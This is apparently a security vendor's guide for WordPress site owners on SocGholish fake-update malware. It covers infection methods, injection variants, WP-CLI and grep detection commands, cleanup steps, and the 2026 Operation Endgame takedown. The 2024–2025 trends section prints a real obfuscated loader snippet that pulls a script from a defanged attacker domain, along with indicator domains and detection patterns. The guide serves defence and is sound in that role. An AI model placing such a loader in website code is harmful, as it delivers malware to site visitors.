SocGholish Malware: A Complete Guide for WordPress Site Owners

In June 2026, law enforcement agencies from four countries executed the single largest WordPress malware remediation in history. They removed backdoors from 14,971 WordPress sites. They dismantled 106 command-and-control servers. And they did it quietly — the data had been sealed inside a 3-year international criminal investigation.

The malware behind those 14,971 infections is called SocGholish. It had been operating undetected on those sites for up to three years. The site owners had no idea. Their visitors had no idea. That is exactly how SocGholish is designed to work.

This article is the technical deep-dive. It covers everything a WordPress site owner needs to know: what SocGholish is, how it infects sites, the six injection patterns to look for in your code, how to detect it using both automated scanners and manual WP-CLI commands, how to clean an infection step by step, and how to prevent it from coming back. For the news story about the Operation Endgame takedown that made this possible, read our Operation Endgame Season 3 advisory.

What Is SocGholish?

SocGholish — also tracked as FakeUpdates, DEV-0206, GOLD PRELUDE, Mustard Tempest, TA569, and UNC1543 — is a JavaScript malware framework that has been active since at least 2017. Its purpose is not to deface websites or steal data directly. Its purpose is to turn legitimate WordPress sites into malware distribution platforms.

Here is how it works: attackers compromise a WordPress site. They inject obfuscated JavaScript into the site’s pages. When a visitor lands on the site, the script triggers a fake browser update prompt — designed to look exactly like a legitimate Chrome, Firefox, or Edge update notification. If the visitor downloads and runs the “update,” they are actually installing malware that gives attackers remote access to their computer. That access is then sold or used to deploy ransomware, steal credentials, or move laterally through corporate networks.

The sites hosting these fake updates look completely normal. No defacement. No downtime. No warning in Google Search Console. The site owner sees a functioning WordPress site. Every visitor sees a malware trap.

SocGholish is linked to Evil Corp (also tracked as Indrik Spider), a Russian cybercriminal group sanctioned by the UK, US, and Australian governments. Evil Corp is also behind Zeus, Dridex, and multiple ransomware and money-laundering operations. Sixteen named individuals from Evil Corp currently appear on the EU Most Wanted list. PRODAFT has linked SocGholish to the SolarWinds supply chain attack, and Microsoft has identified it as a loader for other malware types used by Evil Corp.

The scale of the operation is staggering:

Metric	Number	Source
Compromised WordPress instances	1.44 million	Shadowserver (May 2023–May 2025)
Unique domains affected	1.13 million	Shadowserver
Sites remediated in Operation Endgame	14,971	Dutch National Police (June 2026)
Email addresses exposed	154,000	Have I Been Pwned
Previously unseen passwords	500,000+	Have I Been Pwned
NDSW/NDSX detections (single year)	110,000+	Sucuri (2023)
Khutmhpx detections (single year)	20,000+	Sucuri (2023)

What SocGholish Does to Your WordPress Site

Most WordPress malware leaves a visible trace. A defacement. A redirect. A Google warning. A hosting suspension. You know something is wrong because you can see it.

SocGholish leaves no trace visible to the site owner. Your site loads normally. Your admin panel works. Your plugins update. Google Search Console shows no security issues. And every visitor who lands on your site during the infection window is being served a fake browser update prompt designed to infect their computer.

Here is what happens to an infected site:

• Google Safe Browsing blacklisting. Once Google detects the malicious JavaScript, your site gets flagged with a “This site may harm your computer” warning. Every visitor using Chrome sees a red warning screen before they can access your site. Traffic drops to near zero. If this has already happened, see our guide on removing the Google Safe Browsing warning — but do not request a review until the infection is fully cleaned.
• Hosting provider suspension. Most hosting companies run automated malware scanners. When they detect SocGholish injections, they suspend the account or quarantine the site. Your site goes offline. Your email may go with it.
• Browser warnings for every visitor. Even before Google blacklists the site, Chrome, Firefox, and Edge may display warnings to visitors based on their own threat detection. Each warning costs you visitors, customers, and trust.
• SEO damage. Google may remove infected pages from search results entirely. Rankings that took years to build can disappear in days.
• Reputation damage. Visitors who get infected by malware served from your site do not blame SocGholish. They blame you. If you run an agency and a client’s site infects their customers, you may lose the client permanently.
• Your site becomes a weapon. You are not the victim SocGholish is designed to harm. Your visitors are. Your site is the delivery mechanism. You are unknowingly attacking the people who trust your website.

Send this to your developer or the person who manages your WordPress site. The detection commands and cleanup steps below are copy-paste ready. If you manage client sites, forward this to your clients. The DIY-vs-Pro decision framework will tell them whether they can handle cleanup themselves or need expert help.

How SocGholish Infects WordPress Sites

Compromise Methods

SocGholish operators gain access to WordPress sites through six primary vectors. Understanding how they get in is the first step to keeping them out.

1. Password spraying and brute-force attacks. Automated tools guess common WordPress admin credentials — “admin” / “password,” the site name, the domain name. Once they find a working login, they have the keys.
2. Leaked or reused credentials. Credentials exposed in other data breaches are tested against WordPress sites at scale. If your WordPress admin password is the same as your password on a compromised service, attackers already have it. The Operation Endgame dataset contained 1.4 million WordPress credentials — many of them harvested from unrelated breaches and reused by site owners.
3. Plugin, theme, and core vulnerabilities. Unpatched software with known exploits is the most common entry point. SocGholish operators track vulnerability disclosures closely. By the time a patch is released, they are already scanning for unpatched sites.
4. Credential-stealing malware on site owners’ computers. Keyloggers and infostealers capture FTP, cPanel, and WordPress credentials directly from the site owner’s machine. The attacker never needs to guess a password — they watch you type it.
5. Third-party service exploitation. Compromised hosting panels, DNS providers, or registrar accounts give attackers control at a level above WordPress. They can modify files, change DNS records, or add subdomains without ever logging into WordPress itself.
6. Domain Shadowing. Attackers gain access to the authoritative DNS provider or registrar for a legitimate domain, then quietly create malicious subdomains — update.example.com, cdn.example.com, static.example.com — that point to criminal infrastructure. Because the subdomains inherit the reputation of the legitimate domain, they bypass security filters. We cover the detection pattern for domain shadowing in the Injection Patterns section below.

How the Malware Spreads to Visitors

Once a WordPress site is compromised, the infection chain is fast and nearly invisible:

1. Malicious JavaScript is injected into the site’s pages — typically at the bottom of .js files, at the top of HTML pages, or embedded in the active theme’s functions.php.
2. A visitor lands on the infected site. The JavaScript fires.
3. A fake browser update prompt appears — designed to look exactly like a legitimate Chrome, Firefox, or Edge update. The prompt warns of a “critical security update” and urges immediate action.
4. The visitor downloads the “update” — actually a .zip or .js file containing malware.
5. If executed, the malware connects to a Command and Control (C2) server. The C2 determines the victim’s environment and deploys secondary payloads: Remote Access Trojans (RATs), infostealers, Cobalt Strike beacons, or ransomware.
6. The infected visitor’s computer is now under attacker control. The compromise of the WordPress site has successfully created a new victim — and the site owner never knew it happened.

Common SocGholish Injection Patterns on WordPress

SocGholish operators run affiliate programs that allow multiple criminal groups to use the same infrastructure. Different affiliates use different injection methods. The result: multiple malware campaigns, all serving the same SocGholish fake browser update payload. Understanding the variants helps you find them in your own code.

Pattern	Where Found	What to Look For	Prevalence	Cleanup Difficulty
NDSW/NDSX	Bottom of .js files	if(ndsw===undefined) obfuscated JavaScript	110K+ sites (2023)	High — can infect thousands of files
Khutmhpx	Top of web pages	Variable-named injections, Keitaro TDS URLs	20K+ sites (2023)	Medium — multiple injections per page
Fake Plugins	/wp-content/plugins/	Unknown plugins with legitimate-looking names	Unknown	Medium — delete plugin, audit for reinfection
functions.php	Active theme directory	Injected code blended with legitimate theme code	Unknown	Low–Medium — single file, but easy to miss
Domain Shadowing	DNS records	Unauthorized subdomains (update., cdn., static.)	Unknown	High — requires DNS/registrar access audit
2024–2025 Trends	Various	Self-executing function pattern, known malicious domains	~8,700 sites each (H1 2024)	Varies

NDSW/NDSX Injections

The most prevalent SocGholish variant. In 2023 alone, Sucuri detected NDSW injections on over 110,000 sites. The obfuscated JavaScript begins with if(ndsw===undefined) and is typically found at the bottom of .js files on compromised sites.

NDSW uses a layered approach: malicious PHP files hide NDSX layers, which then fetch the SocGholish payload from a third-party server. This layering makes detection and removal more difficult. A single NDSW infection can spread across thousands of files on one site — each file becoming a separate instance of the malware.

If your site has NDSW/NDSX, a DIY manual cleanup is tricky. For a detailed step-by-step cleanup walkthrough specific to NDSW/NDSX infections — including how to identify layered NDSX payloads and verify complete removal — see our NDSW/NDSX JavaScript malware cleanup guide.

Khutmhpx Injections

The second most prevalent variant, named after a variable used in its injections. Sucuri detected khutmhpx on over 20,000 sites in 2023. Multiple khutmhpx injections are often found at the top of infected web pages — sometimes dozens on a single page. Some are duplicates; others use different domains and Keitaro TDS (Traffic Distribution System) URLs.

Khutmhpx sometimes redirects traffic through VexTrio, an additional obfuscation layer that makes tracing the infection chain more difficult. The main payload is SocGholish, but it is not the only payload — VexTrio can deliver additional malware alongside it.

Fake WordPress Plugins

Attackers with compromised admin credentials upload malicious plugins that appear legitimate but serve SocGholish payloads. These plugins often use names that mimic real, trusted plugins — a technique designed to survive casual inspection. Because the plugin persists until manually deleted, it survives theme changes and WordPress core updates. Deactivation is not enough. The plugin must be deleted entirely.

Theme functions.php Injections

Malicious code injected into the active WordPress theme’s functions.php file blends with legitimate theme code, making it harder to spot than a standalone malicious plugin. The injection survives until the theme is changed or the file is manually cleaned. If you switch themes without cleaning functions.php first, the infection remains in the old theme’s files — ready to reactivate if the theme is ever switched back.

Domain Shadowing Patterns

Earlier we covered how attackers gain DNS access through compromised registrars and hosting panels. Here we cover what domain shadowing looks like when you are inspecting your records.

Attackers create subdomains under your legitimate domain — update.yourdomain.com, cdn.yourdomain.com, static.yourdomain.com — that point to attacker-controlled servers. These subdomains host fake browser update pages that serve the SocGholish payload. Because the subdomains inherit the good reputation of your legitimate domain, they bypass security filters that would block a direct connection to a known-malicious IP.

Check your DNS records and hosting control panel for any subdomains you did not create. Pay special attention to A records and CNAME records pointing to IP addresses or hosts you do not control.

2024–2025 Trends

In the first five months of 2024, two particularly common injection domains were detected on approximately 8,700 sites each: aitcaid[.]com and marvin-occentus[.]net. Payload URLs followed patterns like /9659650c81ce1b984c58.js and /statistic/js/stat.js.

The payload loader uses a self-executing function pattern:

;(function(v,d,r,y,a,b){a=d.createElement(r);b=d.getElementsByTagName(r)[0];
a.async=1;a.src=y;b.parentNode.insertBefore(a,b);})
(window,document,'script','hxxps://pluralism.themancav[.]com/lbK9kO6Q3vnxkIeio4aRsueQh7L82d/o+dXbsug=');

Specific domain names and payload URLs change frequently. The patterns above were observed in 2024–2025. Current SocGholish campaigns may use different domains. The detection methods in the next section will catch current variants regardless of the specific domains they use.

How to Detect SocGholish on Your WordPress Site

Detection methods ordered from fastest to most thorough. If you want to check right now, start with method 1. If you need to be certain, work through all seven.

1. Automated Scan (Fastest)

Run a free WebScan. It detects known SocGholish signatures, NDSW/NDSX patterns, khutmhpx variables, malicious plugin files, unauthorized admin users, and domain shadowing evidence — typically in under 60 seconds. No installation required. Works for any public website, not just WordPress.

2. User Audit

Check for unauthorized WordPress admin accounts. Attackers frequently add backdoor administrator accounts that they can use to regain access after cleanup. Delete any user you do not recognize.

WP-CLI command:

wp user list --role=administrator --fields=ID,user_login,user_email,user_registered

Look for: usernames you do not recognize, email addresses that are not yours, accounts created recently that you did not add, or accounts with generic names like “admin,” “support,” “wordpress,” or “wp.”

3. Plugin Audit

Review every installed plugin. Delete anything you do not actively use. Deactivation is not enough — SocGholish plugins can remain dormant while deactivated and reactivate later. Delete them entirely.

WP-CLI command:

wp plugin list --status=active --fields=name,version,title

Also list inactive plugins:

wp plugin list --status=inactive --fields=name,version,title

Delete anything you do not recognize or no longer need:

wp plugin delete plugin-name

4. DNS Audit

Log into your DNS provider or hosting control panel. Review every DNS record — A records, CNAME records, and subdomains. Look for entries pointing to IP addresses or hosts you do not control. Pay special attention to subdomains like update, cdn, static, assets, or api that you did not create.

WP-CLI commands to check the site URL and home URL (verify they have not been modified):

wp option get siteurl
wp option get home

5. Manual Code Inspection

Search your WordPress files for known SocGholish patterns. These grep commands will find the most common injection signatures:

grep -r "ndsw\|NDSX\|khutmhpx" wp-content/ --include="*.php" --include="*.js"
grep -r "eval(base64_decode" wp-content/ --include="*.php"
grep -r "wscript\|cscript\|.js" wp-content/ --include="*.php"

Also check for unknown .js files loading from unfamiliar domains. Look for script tags with src attributes pointing to domains you do not own or recognize — especially domains ending in uncommon TLDs or using randomized subdomains.

6. Database Inspection

SocGholish injections are not limited to files. Malicious JavaScript is often injected directly into the WordPress database — in post content, widget settings, theme options, and plugin configurations.

WP-CLI database search commands:

wp db search 'ndsw' --all-tables
wp db search 'khutmhpx' --all-tables
wp db search 'eval(base64_decode' --all-tables

Also search for common obfuscation patterns:

wp db search 'String.fromCharCode' --all-tables
wp db search 'atob(' --all-tables

Check the wp_options table for unauthorized entries:

wp db search 'script' wp_options

Database inspection is a differentiator that most competitors do not cover. Many WordPress malware scanners check files only. SocGholish can survive a file-only cleanup by persisting in the database. Always check both.

7. File Integrity Monitoring

Compare your current WordPress files against known-clean copies. WordPress core files can be verified against official checksums:

wp core verify-checksums

For themes and plugins, compare against fresh downloads from WordPress.org or the original developer. Any file that does not match the official version — especially .js files and .php files — should be inspected.

The fastest way to check for all of these indicators at once: Run a free WebScan. It detects SocGholish signatures, unauthorized users, suspicious plugins, and domain shadowing evidence in under 60 seconds. If the scan finds anything, you will know exactly which detection method to follow up with.

How to Clean a SocGholish Infection

Follow these steps in order. The sequence matters: audit users before rotating credentials so you find backdoor accounts before you lock yourself out of the ability to find them. End with verification so you know the cleanup succeeded.

1. Take the site offline. Put up a maintenance page to stop serving malware to visitors while you clean. Every minute the site stays live is another minute visitors are being exposed.
2. Audit and remove malicious users. Check WordPress admin accounts, FTP accounts, database users, and hosting panel users. Delete any you do not recognize. Find the backdoors first — then lock them out.
3. Change all credentials. WordPress admin password, database password, FTP/SFTP credentials, hosting control panel login, DNS/registrar account password — every access point. Use strong, unique passwords generated by a password manager. Do not reuse passwords across services.
4. Enable multi-factor authentication. On every account that supports it. A leaked password alone should not be enough to access your site.
5. Identify and remove injected code. Clean all infected files. NDSW/NDSX infections can affect thousands of files. If you have a verified clean backup from before the infection date, restore it. If not, use an automated scanner that can identify and remove malicious code across every file on the server.
6. Remove malicious plugins. Delete any plugins you do not recognize. Deactivation is not enough. Delete them entirely — including the plugin directory under /wp-content/plugins/.
7. Clean the database. Remove injected JavaScript from posts, pages, options, and user meta tables. Use the database inspection commands from the Detection section above to find malicious entries, then remove them.
8. Delete unauthorized subdomains. Remove any rogue DNS records from your DNS provider or hosting control panel. If the attacker had registrar-level access, verify that your domain’s nameservers have not been changed.
9. Update everything. WordPress core, all themes, all plugins — apply every available update. Attackers exploit known vulnerabilities. Patching closes those doors.
10. Remove unused software. Delete inactive themes and plugins entirely. They are not harmless just because they are deactivated. They are unmonitored code with known or unknown vulnerabilities sitting on your server.
11. Scan again. After cleanup, run a fresh scan to verify no residual malware remains. This is not optional. Do not assume the cleanup worked. Verify it.

Should You Do This Yourself or Call an Expert?

You can DIY if…	You need an expert if…
Infection is confined to a few files	NDSW/NDSX has infected thousands of files
You have a verified clean backup from before the infection	No backup exists or the backup may also be infected
You are comfortable with WP-CLI and code inspection	You are not technical or do not have the time to do it right
No unauthorized admin accounts were found	Multiple backdoor accounts exist across WordPress, FTP, and database
The site is not business-critical	The site generates revenue or serves clients who depend on it

If you are in the right column, our WordPress Malware Removal Service provides same-day expert cleanup with a full investigation report. You get a clean site, a documented remediation trail, and specific hardening recommendations — not just a deleted file and a hope that the problem is gone.

How to Prevent SocGholish Reinfection

1. Use strong, unique passwords. A password manager with random generation for every account. No reuse. No patterns. No exceptions.
2. Enable multi-factor authentication everywhere. WordPress, hosting control panel, DNS provider, email — every access point that supports MFA should have it turned on.
3. Keep everything updated. Enable automatic updates for WordPress core. Schedule regular updates for plugins and themes. Check weekly.
4. Remove unused software. Delete, do not deactivate. Inactive themes and plugins are attack surface with no benefit.
5. Run regular malware scans. The Malcure Advanced Edition plugin provides scheduled forensic scanning of files and databases with checksum verification against official WordPress APIs. If your site is modified — by you, by a plugin update, or by an attacker — you will know.
6. Monitor file integrity. Set up alerts for unexpected file changes. Any modification to a file you did not make yourself is a potential compromise.
7. Deploy a web application firewall. A WAF blocks exploit attempts before they reach your site and virtually patches known vulnerabilities until you can update the affected software.
8. Use least-privilege user accounts. Do not give administrator access to users who do not need it. A content editor does not need the ability to install plugins. A customer support account does not need to edit theme files.
9. Monitor DNS records. Set up alerts for new subdomains or DNS changes. Domain shadowing is invisible unless you look for it.
10. Check Have I Been Pwned periodically. Monitor your domain’s email addresses for credential leaks. A leaked password from an unrelated breach can become the key to your WordPress site. Check at haveibeenpwned.com.

Yes, steps 1–4 appear in the cleanup section too. That is intentional. After an infection, you do them because you must. For prevention, you do them because you should. The difference is urgency, not importance.

The Post-Operation-Endgame Threat Landscape

Operation Endgame Season 3 achieved something unprecedented: 106 servers dismantled, 14,971 WordPress sites cleaned, and a botnet disabled — all through coordinated international law enforcement action. It is the largest WordPress malware remediation in history and a proof of concept for public-private partnership at scale.

But it is not the end of the story.

Evil Corp, the criminal group behind SocGholish, is still operating. Sixteen named individuals remain on the EU Most Wanted list. The group has weathered disruptions before. After each previous season of Operation Endgame, malware operators adapted — new domains, new obfuscation techniques, new injection methods. Assume SocGholish will evolve. The specific infrastructure taken down in June 2026 is gone. The criminal organization that built it is not.

The 14,971 sites that were cleaned by law enforcement are now free of backdoors. But 1.4 million WordPress credentials were confirmed to be in criminal possession. Those credentials do not expire. They have been shared, sold, and archived. The sites they belong to may not be infected today, but the keys to those sites are out there. If you have not rotated your WordPress credentials since 2023, there is a non-trivial probability that your login is among those 1.4 million.

WordPress powers 43% of all websites on the internet. The attack surface is not going to shrink. What can change is how quickly site owners detect compromise, how systematically they rotate credentials, and how seriously they treat the mundane work of updates, user audits, and access control.

For the full story of the June 2026 takedown — the 3-year sealed investigation, the agencies involved, the victim notification pipeline, and what Dutch police, RCMP, and Shadowserver are urging site owners to do right now — read our Operation Endgame Season 3 advisory.

Frequently Asked Questions

---

For the news story about the Operation Endgame Season 3 takedown that disrupted SocGholish infrastructure on June 18, 2026, read our Operation Endgame advisory: 14,971 WordPress Sites Cleaned in Global SocGholish Takedown.